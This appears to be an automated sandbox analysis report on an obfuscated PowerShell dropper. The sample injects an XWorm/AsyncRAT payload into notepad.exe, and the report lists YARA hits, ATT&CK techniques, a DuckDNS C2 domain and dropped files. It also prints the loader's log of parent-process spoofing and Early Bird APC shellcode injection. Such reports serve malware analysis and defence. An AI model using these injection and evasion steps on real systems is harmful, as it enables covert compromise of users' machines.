              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 3300, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MetasploitPayload
              Source: Yara matchFile source: amsi64_1780.amsi.csv, type: OTHER
              Yara detected XWorm
              Source: Yara matchFile source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 3300, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              PowerShell              		1
              DLL Side-Loading              		411
              Process Injection              		1
              Masquerading              		1
              Input Capture              		1
              Process Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Application Window Discovery              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
              Process Injection              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets13
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              py.ps10%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              nmds.duckdns.org1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              nmds.duckdns.orgtrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/DARKNOSY/Rush-PowerShell-Obfuscatorpowershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1false
                		high

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1429326
                Start date and time:2024-04-21 23:25:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 26s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:py.ps1
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winPS1@4/10@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 13
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .ps1

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                23:26:26API Interceptor54x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\notepad.exe.log

                Download File
                Process:C:\Windows\System32\notepad.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):654
                Entropy (8bit):5.380476433908377
                Encrypted:false
                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9434
                Entropy (8bit):4.9243637703272345
                Encrypted:false
                SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                MD5:EF4099FCAB6D29945272316889156337
                SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllulv4iZ:NllUg
                MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                Malicious:false
                Reputation:low
                Preview:@...e.................................~..............@..........

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0zzjtad.urv.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_joyns0zn.t4f.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcgvnz3n.01j.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrf1tlnt.y2e.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6224
                Entropy (8bit):3.7218905206726274
                Encrypted:false
                SSDEEP:48:bLNVDzlatJ13CyUU2UWm5ukvhkvklCywZcqWNblHJqlSogZox8qWNbltqlSogZoD:1F413C2TUkvhkvCCty9NbHHR9NbvHW
                MD5:D1A7067F92D84246CA895C5FF8A8ED33
                SHA1:FD08CC94DB4742C05767522EF9F54BB817F20293
                SHA-256:1E4378E0348177E61FF27EF52194914B5E578C4793ACB481DC3F719CDE7BC6F5
                SHA-512:573220DD978F3E1242B444D37FF5211D4C1BAA5E7D2C2E120EC3C8F0646C14C5E4F401F09E0494194AC602E5B520B388687C7B1B910F0A287DE753EA5F321AEF
                Malicious:false
                Preview:...................................FL..................F.".. ...J.S...a5_.2...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......~2...v.m.2.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.XA............................^.A.p.p.D.a.t.a...B.V.1......X<...Roaming.@......EW<2.X<...../......................G;.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X:.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X:.....2.....................i6..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X:.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X:.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.XC.....u...........

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5Z3O7SBU59ZQU5LJUYPU.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6224
                Entropy (8bit):3.7218905206726274
                Encrypted:false
                SSDEEP:48:bLNVDzlatJ13CyUU2UWm5ukvhkvklCywZcqWNblHJqlSogZox8qWNbltqlSogZoD:1F413C2TUkvhkvCCty9NbHHR9NbvHW
                MD5:D1A7067F92D84246CA895C5FF8A8ED33
                SHA1:FD08CC94DB4742C05767522EF9F54BB817F20293
                SHA-256:1E4378E0348177E61FF27EF52194914B5E578C4793ACB481DC3F719CDE7BC6F5
                SHA-512:573220DD978F3E1242B444D37FF5211D4C1BAA5E7D2C2E120EC3C8F0646C14C5E4F401F09E0494194AC602E5B520B388687C7B1B910F0A287DE753EA5F321AEF
                Malicious:false
                Preview:...................................FL..................F.".. ...J.S...a5_.2...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......~2...v.m.2.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.XA............................^.A.p.p.D.a.t.a...B.V.1......X<...Roaming.@......EW<2.X<...../......................G;.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X:.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X:.....2.....................i6..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X:.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X:.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.XC.....u...........

                \Device\ConDrv

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):754
                Entropy (8bit):4.94526632697741
                Encrypted:false
                SSDEEP:12:NF+lDB5j7hV1cTivQN+GISkvXQKp2nWxktjXYHAWuOXQKtP2axoEIsgkvmr6aAlq:NF+lD7j7Nwivs+G7LKp2nXYTeKtP26LQ
                MD5:756C98B8ADCF531039DAAEAB52DAE2A1
                SHA1:373E22FDA8252B0A2F944808E455639E52BAE60B
                SHA-256:BA46313AAEFB4FD88A41B390926B968056E08376DDDC2FB7E12BE86F35358187
                SHA-512:34B22A7B3C765B1E02952E9419094FF0C1DA14EA8412DD3B3D522452675402D3D8E0D836A7C391C3D6223200A55F031E2A9A26AB1742923B281DC7FDF6B9C631
                Malicious:false
                Preview:[+] Launching a sacrificial process. [*] Spoofed parent process: explorer.exe (PID: 4004). [*] Spawned process: .C:\Windows\System32\notepad.exe (PID: 3300)..[+] Injecting shellcode via Early Bird APC Queue. [*] Memory allocated. [-] Size: ..61440 bytes. [-] Address: ..0x000001D112FC0000. [-] Protection: .PAGE_READWRITE. [*] Payload decrypted and written. [-] Size: ..59648 bytes. [-] Address: ..0x000001D112FC0000. [*] Memory protection changed. [-] Protection: .PAGE_EXECUTE_READ. [*] APC queued. [-] Thread ID: ..6932. [*] Thread resumed. [*] Payload executed..[+] Closing opened handles. [*] Process Handle: .0x0000000000000964. [*] Thread Handle: ..0x000000000000097C.

                Static File Info

                General

                File type:ASCII text, with very long lines (65346), with CRLF line terminators
                Entropy (8bit):4.925742914506138
                TrID:
                  File name:py.ps1
                  File size:13'631'488 bytes
                  MD5:b570fa6c00d2478e939db9f5a3217afd
                  SHA1:246ea84aa4fabbf26048d8a5bf9e66918971c1a1
                  SHA256:de367800fbe772f10c52e4dff9a39de73ab08379c19f326680dc677eeba69bbc
                  SHA512:0e1a180e115bd88d08a14b4f013010f340f49b61efbe571f0df05eff04ec1339b718c01f94d7983224329ee472e4f9e27e86d992f60493c87d8f16154762656e
                  SSDEEP:49152:89givjXNuAV4p+ldPmADhRSDuTFTqUeBOZ5i3v:
                  TLSH:DCD6AE60BF945AF9EF8D1D3E905AAB1DC7F042172C32706BFA519F01B9DA146810B26F
                  File Content Preview:# Obfuscated using https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator, made by DARKN0$Y....$decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(@"..IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9Sd

                  File Icon

                  Icon Hash:3270d6baae77db44

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:23:26:04
                  Start date:21/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1"
                  Imagebase:0x7ff6e3d50000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:23:26:05
                  Start date:21/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:23:26:40
                  Start date:21/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\notepad.exe
                  Imagebase:0x7ff6a0030000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:moderate
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:15.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:27.1%
                    Total number of Nodes:48
                    Total number of Limit Nodes:7
                    execution_graph 1971 1d112fc9cb8 LoadLibraryA 1972 1d112fc9cd0 1971->1972 1973 1d112fc9cda 1971->1973 1973->1972 1974 1d112fc9d0a VirtualProtect 1973->1974 1974->1972 1975 1d112fc9d28 1974->1975 1976 1d112fc9d36 VirtualProtect 1975->1976 1977 1d112fc9d56 1976->1977 1977->1972 1978 1d112fc9d71 VirtualProtect 1977->1978 1978->1972 1979 1d112fc9d8a 1978->1979 1980 1d112fc9d98 VirtualProtect 1979->1980 1980->1972 1981 1d112fcab03 1982 1d112fcab2a 1981->1982 1983 1d112fcab65 VirtualAlloc 1982->1983 1984 1d112fcab82 1982->1984 1983->1984 1985 1d112fcabae 1983->1985 1985->1984 1986 1d112fcac67 LoadLibraryA 1985->1986 1988 1d112fcac82 1985->1988 1994 1d112fcae5a 1985->1994 1986->1985 1987 1d112fcaf02 VirtualFree 1987->1984 1988->1994 1996 1d112fcad36 1988->1996 2012 1d112fc9cab 1988->2012 1990 1d112fcad0c 1991 1d112fcad10 1990->1991 1997 1d112fc9dc3 LoadLibraryA 1990->1997 1991->1990 1991->1994 1994->1987 1996->1994 2007 1d112fca8bb 1996->2007 1998 1d112fc9de8 1997->1998 1999 1d112fc9df2 1997->1999 1998->1994 1998->1996 1999->1998 2000 1d112fc9e22 VirtualProtect 1999->2000 2000->1998 2001 1d112fc9e40 2000->2001 2002 1d112fc9e4e VirtualProtect 2001->2002 2003 1d112fc9e6e 2002->2003 2003->1998 2004 1d112fc9e89 VirtualProtect 2003->2004 2004->1998 2005 1d112fc9ea2 2004->2005 2006 1d112fc9eb0 VirtualProtect 2005->2006 2006->1998 2008 1d112fca8fb CLRCreateInstance 2007->2008 2009 1d112fca910 2007->2009 2008->2009 2010 1d112fca9f5 SysAllocString 2009->2010 2011 1d112fca9b9 2009->2011 2010->2011 2011->1994 2013 1d112fc9cb8 LoadLibraryA 2012->2013 2014 1d112fc9cd0 2013->2014 2015 1d112fc9cda 2013->2015 2014->1990 2015->2014 2016 1d112fc9d0a VirtualProtect 2015->2016 2016->2014 2017 1d112fc9d28 2016->2017 2018 1d112fc9d36 VirtualProtect 2017->2018 2019 1d112fc9d56 2018->2019 2019->2014 2020 1d112fc9d71 VirtualProtect 2019->2020 2020->2014 2021 1d112fc9d8a 2020->2021 2022 1d112fc9d98 VirtualProtect 2021->2022 2022->2014

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
